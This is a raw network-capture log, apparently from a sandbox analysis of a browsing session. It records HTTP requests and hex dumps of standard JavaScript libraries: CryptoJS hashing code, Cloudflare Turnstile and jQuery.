                                                  Data Ascii: :0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|
                                                  2024-12-09 08:34:39 UTC1369INData Raw: 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66
                                                  Data Ascii: ffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringif
                                                  2024-12-09 08:34:39 UTC1369INData Raw: 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d
                                                  Data Ascii: r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLM
                                                  2024-12-09 08:34:39 UTC1369INData Raw: 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d
                                                  Data Ascii: bs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=
                                                  2024-12-09 08:34:39 UTC1369INData Raw: 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31
                                                  Data Ascii: 39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449748104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:40 UTC646OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://or.smelsgycz.ru/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:41 UTC471INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:41 GMT
                                                  Content-Type: application/javascript; charset=UTF-8
                                                  Content-Length: 47692
                                                  Connection: close
                                                  accept-ranges: bytes
                                                  last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                  access-control-allow-origin: *
                                                  cross-origin-resource-policy: cross-origin
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a84e4876425b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                  Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                  Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                  Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 4f 56 45 52 52 55 4e 4e 49 4e 47 3d 22 6f 76 65 72 72 75 6e 6e 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72
                                                  Data Ascii: ING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.OVERRUNNING="overrunning",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){r
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 56 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70
                                                  Data Ascii: el",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",V="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recap
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 6c 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 6c 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f
                                                  Data Ascii: existent");return o?Mr({isModeratelyVerbose:l,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&l?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 75 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e
                                                  Data Ascii: __||Object.getPrototypeOf(n)},ce(e)}function ur(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!ur(o))return o;if(typeof o!="function")throw n
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 44 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d
                                                  Data Ascii: &&e.test(r.src))return r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(D(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=
                                                  2024-12-09 08:34:41 UTC1369INData Raw: 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e
                                                  Data Ascii: me="cf-turnstile-feedback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449749151.101.194.1374435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:41 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                  Host: code.jquery.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:41 UTC614INHTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 89501
                                                  Server: nginx
                                                  Content-Type: application/javascript; charset=utf-8
                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                  ETag: "28feccc0-15d9d"
                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                  Access-Control-Allow-Origin: *
                                                  Cross-Origin-Resource-Policy: cross-origin
                                                  Via: 1.1 varnish, 1.1 varnish
                                                  Accept-Ranges: bytes
                                                  Date: Mon, 09 Dec 2024 08:34:41 GMT
                                                  Age: 2254813
                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740052-EWR
                                                  X-Cache: HIT, HIT
                                                  X-Cache-Hits: 2774, 28
                                                  X-Timer: S1733733281.492884,VS0,VE0
                                                  Vary: Accept-Encoding
                                                  2024-12-09 08:34:41 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                  2024-12-09 08:34:41 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
